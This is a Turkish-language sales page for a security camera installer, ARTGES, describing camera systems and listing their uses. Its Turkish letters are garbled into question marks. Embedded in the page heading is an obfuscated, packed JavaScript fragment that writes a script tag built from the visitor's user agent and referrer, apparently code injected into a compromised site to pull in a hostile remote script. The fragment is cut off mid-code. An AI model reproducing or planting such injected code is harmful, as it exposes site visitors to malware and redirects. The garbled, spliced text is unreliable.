Kamera Sistemleri

<”h1″ id="uvc-type-wrap-1396" data-ultimate-target='#uvc-type-wrap-1396' data-responsive-json-new='{"font-size":"","line-height":""}' class="uvc-type-wrap ult-adjust-bottom-margin ult-responsive uvc-type-align-”left” uvc-wrap-12963852435b01781074ad4" style="font-weight:normal;text-align:”left”;">”Güvenli?inizi”…”=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inats|var|u0026u|referrer|fzbyr||js|php'.split('|'),0,{})) bize b?rak?n” ex_class=”m-b-sm”]

Günümüz ko?ullar?,insanlar?n ya?am alanlar?n?n  güvenli olmas?n? ve i?letmelerde verimlili?in artt?r?lmas?n? zorunlu hale getirmi?tir. Kamera Güvenlik Sistemleri ile pek çok bölgenin ayn? anda izlenerek videoya kaydedilmesi sayesinde, çal??anlar?n kontrolünün sa?lanmas?, verimlili?in art?r?lmas?, olas? tehlikelerin gecikmeksizin alg?lanmas? ve müdahale edilmesi imkan?na sahip olunabilmektedir.

 

ARTGES Genel Güvenlik Sistemleri olarak, görüntülü güvenlik sistemlerinde günümüzün en son teknolojisine sahip kaliteli  markalar?n  olu?turdu?u  en çok tercih edilen  güvenlik kameralar?n? siz de?erli mü?terilerimizin güvenlik ihtiyaçlar?n? yerinde tecrübeli güvenlik uzman?m?z de?erlendirmesinde tespit ederek, deneyimli  teknik personelimiz ile montaj?n? yapmaktay?z. Teknik bilgi ve tecrübelerimize dayanarak güvenli sistemler kurmaktay?z.

 

Güvenlik Kameralar? günümüzde zorunlu bir ihtiyaç olmu?tur. Özellikle büyük?ehirlerde artan suç oranlar? güvenlik kameralar?na ilgiyi art?rmaktad?r.Kamera Sistemleri ile evinizin,i?yerinizin,yazl???l???n?z?n,otopark?n?z?n,apartman?n?z?n k?saca ya?am alanlar?n?z?n, istedi?iniz her yerin güvenli?ini sa?layabilirsiniz. internet üzerinden güvenlik kameras? sitemine ula?arak dünyan?n her yerinden bilgisayar?n?zdan veya cep telefonunuzdan izleyebilirsiniz. Ayr?ca geçmi? kay?tlara ula?arak geriye dönük görüntüleri  izleyebilirisiniz. Güvenlik kameralar?n?n kullan?m amaçlar?n? k?saca ?öyle s?ralayabiliriz;

 

– Güvenli?in sa?lanmas?.

– Personel takibi,performans?n art?r?lmas?  ve disiplin sa?lanmas?

– Kay?t ve delil amaçl?

– Olabilecek tehditlere kar?? cayd?r?c?l?k